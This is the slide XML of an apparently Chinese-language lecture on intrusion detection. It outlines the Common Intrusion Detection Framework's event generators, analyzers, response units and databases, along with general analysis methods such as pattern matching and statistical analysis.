            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3148013" y="2243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pic>
        <p:nvPicPr>
          <p:cNvPr id="196611" name="Picture 2" descr="反击网络">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0CA47DC-EDFB-4297-916F-75EC07173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57200"/>
            <a:ext cx="5715000"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612" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7CA90D-A100-44D3-AD38-920407E030EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="5486400"/>
            <a:ext cx="5562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
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>主动攻击模型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA21A381-AE2B-4E33-8F09-41BA2858072D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="1841500"/>
            <a:ext cx="6934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入侵方法</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入侵检测概述</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入侵检测方法与基本原理</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入侵检测响应机制</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>入侵检测标准化工作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>管理</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3E67121F-8CC5-4B79-AA6D-B9964DCEC9E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1828800"/>
            <a:ext cx="7772400" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(The Common Intrusion Detection Framework)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198659" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{316ABFA5-3AC2-4233-9B22-CC8CC1F825DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="6400800" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://www.gidos.org/drafts</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E31B75-5C83-4248-AB66-F634345013DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型（1）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199683" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC466793-FD3E-4747-8F32-365B9FADC246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1905000"/>
            <a:ext cx="7772400" cy="4548188"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统的通用需求以及现有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的系统结构，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统构成划分如下部分：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>事件产生器(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Event Generators)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>事件分析器(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Event analyzers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>响应单元(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Response units)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>事件数据库(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Event databases)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN"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4608B583-8AB8-46CF-A764-41C94C64543A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型（2）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="201731" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90E8843-BF0F-41AC-BC2A-FA675E0E042F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:grayscl/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="1836738"/>
            <a:ext cx="7848600" cy="4583112"/>
          </a:xfr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533A4049-AE6D-4EE4-A30B-C8B2989BC569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865188" y="692150"/>
            <a:ext cx="8283575" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型－事件产生器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203779" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F6318BC-89C1-4CDD-BC8C-1D120A84BE0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865188" y="2019300"/>
            <a:ext cx="7772400" cy="4784725"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>事件产生器的目的是从整个计算环境中获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>事件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，并向系统的其他部分提供此事件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>入侵检测的第一步</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>采集内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>系统日志</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>应用程序日志</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>系统调用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>网络数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>用户行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>的信息</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C369698B-CE1A-4C69-915E-DB34ABA00C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="630238"/>
            <a:ext cx="8786813" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型－事件产生器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204803" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D615605-45AE-4297-84B7-4B67DF02DA90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827088" y="1989138"/>
            <a:ext cx="7772400" cy="4535487"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注意：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>入侵检测很大程度上依赖于收集信息的可靠性和正确性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>要保证用来检测网络系统的软件的完整性，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特别是入侵检测系统软件本身应具有相当强的坚固性，防止被篡改而收集到错误的信息</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967CF57D-286A-4B15-88B4-BA81A2254602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="681038"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型－事件分析器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205827" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A33AF27E-C1D7-4390-B5BD-41D9C494F659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="1844675"/>
            <a:ext cx="7772400" cy="4752975"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>事件分析器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>接收事件信息，对其进行分析，判断是否为入侵行为或异常现象，最后将判断的结果转变为告警信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分析是核心</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>效率高低直接决定整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>性能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>分析方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>模式匹配</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>统计分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>完整性分析（往往用于事后分析）</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4EAD7DC4-2DAA-4E2D-BC83-F5DD3C75F9FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型－响应单元</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207875" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A1C5C00-3B9E-42E8-80AD-7F208AEF6AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
